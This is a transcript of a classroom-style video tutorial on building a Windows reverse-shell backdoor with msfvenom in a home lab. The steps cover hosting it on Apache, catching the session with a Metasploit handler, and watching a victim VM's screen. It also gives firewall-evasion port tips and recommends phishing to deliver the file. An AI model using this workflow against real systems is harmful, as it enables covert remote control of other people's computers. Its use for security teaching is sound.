Good morning, good afternoon, and good evening. Hello everyone. In this video tutorial, I will show you how to create a backdoor using Metasploit. Okay? If this is the first time that you heard about Metasploit, so I will explain a little bit here. Metasploit is one of the most popular tools that ethical hackers use. Okay, so if you want to become an ethical hacker or penetration tester, you may need to learn these tools quite well. All right, here are some of the terminologies that students need to learn and to understand. The first one is called MSF Venom. What is MSF Venom? MSF Venom is a command line instances of Metasploit that is used to generate and output all of the various types and shell code that are available in Metasploit. Okay, so I'm going to use this code in a bit. Payload, what is payload? Payload is a set of malicious code that carry crucial information that can be used to hack any devices. Okay, so payload is a set of malicious codes that carry crucial information that can be used to hack any devices. It can be Windows, Android, or Linux machine. How about exploit? Exploit is a piece of program, software, or script which can allow hackers to take control over the system. So as soon as we find a vulnerabilities of a machine or operating system, we can create an exploit. Okay, you may need to be a good programmer to create an exploit. Okay, uh, student can do some research how to write an exploit of the vulnerabilities operating system or machines. All right, so these are some of the terms that you need to know. So let's create let's uh, let's start with creating a backdoor using Metasploit. Okay, so the command that I'm gonna put is msf venom -p, which is the payload Windows meterpreter, reverse underscore TCP, lhost, which is localhost, is 192.168.56.103. That is my machine. As you can see that I have Kali Linux installed as my VM. ifconfig, when I run a sudo ifconfig, you notice that my IP address is 56.103. All right, so that's my local host. The local port is the local port is 4444. Okay, this is the default local port from Metasploit. Okay, if you want to uh, if student do not want that use this port, because this is the most common port that is used by Metasploit program, and most of the firewall knows that. As soon as the firewall sees this port, unknown port, like this unknown popular port 4444, they know it's going to drop the packets automatically. So in the real world, maybe you're going to use 1 2 3 4 5 6, for example. You make an executable and you convert that as a Windows backdoor.exe. So let's run this code. I'm gonna run this. I'm gonna see if I can copy and paste this. Let me see. Control C, and I'm gonna put it on my Kali Linux here. See if I can do it. Paste clipboard. Oh, it doesn't accept me. All right. So that means I need to type it in. Okay. Let me see here. Sound speaker, let me see. Okay. So, okay, let me just type it then. All right. So, MSF Venom -P payload Windows Metasploit. Okay. Reverse _ TCP lhost, which is localhost. My localhost, which is my IP address, is 192.168.56.103. Okay, and the local port is 444. Okay, and then we can make this as an executable -O. We're gonna convert it into Windows backdoor.exe. Okay, and press enter. Boom. So we need to wait for a few minutes. All right. Let me see what happened. Okay. So this is basically my Kali Linux. This will be my attacker machine. As we move along this presentation, I will move into the victim machine. All right, notice that I was able to create a backdoor, which is Windows backdoor.exe. If I go ls, you see that I have Windows backdoor.exe. All right. So, okay, the next thing we are going to move this Windows backdoor.exe in the web service file, web service location where my Apache server was installed. All right, so we're gonna name this, we're gonna move this. Okay, see if I can copy and paste here. Right click, and then I'm going to do this, paste clipboard on, because I have to enable this. When I start my Kali, I didn't enable it, so let's just do it manually. So we are going to move, we're gonna move this, we are going to move, we're gonna move this Windows backdoor, okay, to the web server location, which is var www.html. All right. Oh, we need to use sudo. Okay, so we need to use sudo. All right, we move this to the, and then we need to move to this directory cd -var www.html. We need to surface Apache to start. Okay, boom, there we go. Whoa, we need to do this one, sudo Apache service start. All right, now we just start the Apache service. If for some reason you don't have Apache installed, so you need to run the Apache. Okay, you have to install the Apache server. Here is the command in case you don't know how to set up the Apache. Let me show it to you. If your Apache is not available, you have to run it using this command. Okay, apt-get install Apache 2. okay? And then you start the service Apache 2 start, okay? And then you check the status, service Apache 2 status, check the status. All right, so let me see. So I just finished the sudo apache start, and after that let me see what's the next thing we need to do.
Subscribe now.
The next one, let me see. So you start that, okay? We need to do this one, change mode, right? Change mode. So we need to do this, what you call this, change mode plus executable. Make sure that the Windows backdoor is executable, exe. Boom, there we go. All right, so let me see, let me pause this. Okay, the next thing that we need to do is to run the Metasploit. How you do that? You go to Kali Linux here, right? You go to Kali and go to tools, exploitable tools, and then click Metasploit framework. I already did earlier, and this is what I see. Okay, so the next command you need to do is to run an exploit. Okay, I have the documentation here. Use exploit multi-handler, right? So use exploit multi-handler. All right, after that you need to do what? You need to set the payload. Okay, you need to do the payload. The command is set payload Windows Metasploit / reverse TCP, right? The reverse TCP. All right, boom, there we go. Now we need to set up the localhost. Set localhost, which is the IP address of my Kali Linux 192.168.56.103, and then the L port is set. The L port is 4444. Again, in the real world, we may have to change this listening port to maybe 1, 2, 3, 4, 5, 6, or maybe 6, 6, 6, 6, 6, 6. Okay, because most of the firewall, they already knows that this is a metasploitable listening port. So once they listen to this port, they will drop it. Okay, set, and then we need to do exploit. Okay, when we run this exploit, notice that we are listening right now. Okay, we are listening from our Kali Linux. All right, so the command is this, right? The command is this. Okay, I will post my documentation on the Blackboard. Okay, this is Kali. This is in Kali. Okay, this is in Kali. All right. All right. This machine, I just set up a new VM machine, which is Windows 7 machine. Okay. If I do ifconfig, ipconfig, notice that my victim machine is 102. All right, and my Kali is 103. So before I do some testing, before I do the metasploitable thing key. Let me ping to this one. Ping 192.168. Let me see. No. 192.168.56.103. All right. Okay. Did it works? Okay. I need to ping this. All right. So let me see if I ping. Okay. All right. If you can see that I can ping from my victim machine to my attacker. Okay. If you cannot ping from this victim machine to the attacker machine, that means you need to disable firewall in Windows. Make sure that you disable the firewall, otherwise you won't be able to ping from the victim to attackers. Now I'm gonna test from my Kali Linux here, right? I'm going to ping, okay, ping 192.168.56.102, all right, because that's my victim machine. Here we go. It gave me the address. Now we have the platform works properly, all right. So let's see, since we already set up the meta readers, right? Since we already start this one, right? We already start the reverse TCP handler. So let's go to this victim machine and open your Internet Explorer, okay? Open your Internet Explorer and then we're gonna type 192.168.56.103/Windows backdoor. Remember, we put this in the web service, right? In the web server, exe. Boom, there we go. Here, remember, this is the backdoor file that we created using this. So, through social engineering, we can send this link to the victim machine, and the moment that the user click this link, let's say that the victim save this one, right? Save this backdoor, right? Save this backdoor and run it, right? If we run this, okay, when we run this, look at my Kali here, right? My Kali Linux already listening here, right? We are listening. Basically the session from this victim machine reverse back to the attacker machine. Therefore, it is very important when somebody send a link, a suspicious link, do not click save that, because you may accidentally create a backdoor, right, for yourself. So therefore, it is very important that we educate the user. Do not click any suspicious link or attachment. Okay, the moment that the user click that, now you can see that we have a session here, right? So if I go to pwd, right, print working directory, notice that we just connect to the victim desktop here. If I click help, all right, when I click help, notice that if I say, okay, let me see if I get this one, okay. Where is this? I want to get, where is that? Here we go, get desktop, right? Get desktop. So I'm going to run this from this one. Get desktop, right? Get desktop. So let me see if I can run this one. Get desktop. Boom, there we go. No, I think there is another one here. Let me see if I can remember. Screen share right here. Enum. No. Screen share, yes. Screen share, okay. Screen share. This is in the real time. Okay, now I get all the information. You see that? The target IP address and the start time, right? This is the victim machine, right? So if I close this and then I'm gonna type a notepad, then I'm gonna do like a notepad here, notepad, Chiluba bueno. Look at that. When the victim type this, look at on my Kali Linux. I can get the session in real time. You see how dangerous is that? Normally, uh, hackers send this through what you call that? Through social engineering or phishing, right? Phishing. So be careful with that. And I think this is all right. Now I'm streaming. Okay, where are we? Here, right? So now you can see that I'm streaming how it works. Okay then, I believe this is all about Metasploit, how to create a backdoor using Metasploit, and hopefully that this video is informative and helpful to you. Be sure that you use this for educational purpose only. If you want to do a real penetration testing or ethical hacking, make sure you get the written permission and check with the federal, state, and local law. All right. So I think I already stopped, right? Yes, I already stopped. Thank you very much for watching.